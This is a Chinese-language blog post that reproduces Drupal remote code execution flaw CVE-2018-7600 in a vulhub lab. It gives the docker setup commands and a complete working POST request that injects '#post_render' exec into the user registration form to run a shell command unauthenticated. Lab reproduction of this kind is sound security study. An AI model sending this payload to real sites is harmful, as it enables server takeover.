您好,登錄后才能下訂單哦!
這期內容當中小編將會給大家帶來有關如何進行Drupal 遠程代碼執行漏洞CVE-2018-7600的復現,文章內容豐富且以專業的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。
Drupal是使用PHP語言編寫的開源內容管理框架(CMF),它由由內容管理系統和PHP開發框架共同構成,在GPL2.0及更新協議下發布。連續多年榮獲全球最佳CMS大獎,是基于PHP語言最著名的WEB應用程序。
2018年3月28日,Drupal Security Team官方發布公告稱Drupal 6,7,8等多個子版本存在遠程代碼執行漏洞,攻擊者可以利用該漏洞執行惡意代碼。
Drupal未對表單請求數據做嚴格過濾,導致攻擊者可以將惡意代碼注入表單內容,此漏洞允許未經身份驗證的攻擊者在默認或常見的Drupal安裝上執行遠程代碼執行。
影響范圍: Drupal 6,7,8等多個子版本
下面僅作漏洞復現記錄與實現,利用流程如下:
一、漏洞環境
本次演示環境采用vulhub搭建,執行以下命令搭建
cd /drupal/CVE-2018-7600/
docker-compose up -d
語言選擇英文,中文安裝可能會報錯,數據庫選擇sqlite數據庫,然后其他都默認就可以了
漏洞鏈接: http://192.168.101.152:8080/
訪問之后是這個樣子的
二、漏洞利用
直接發送以下數據包就可以執行命令了
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 192.168.101.152:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
命令執行成功
上述就是小編為大家分享的如何進行Drupal 遠程代碼執行漏洞CVE-2018-7600的復現了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關知識,歡迎關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。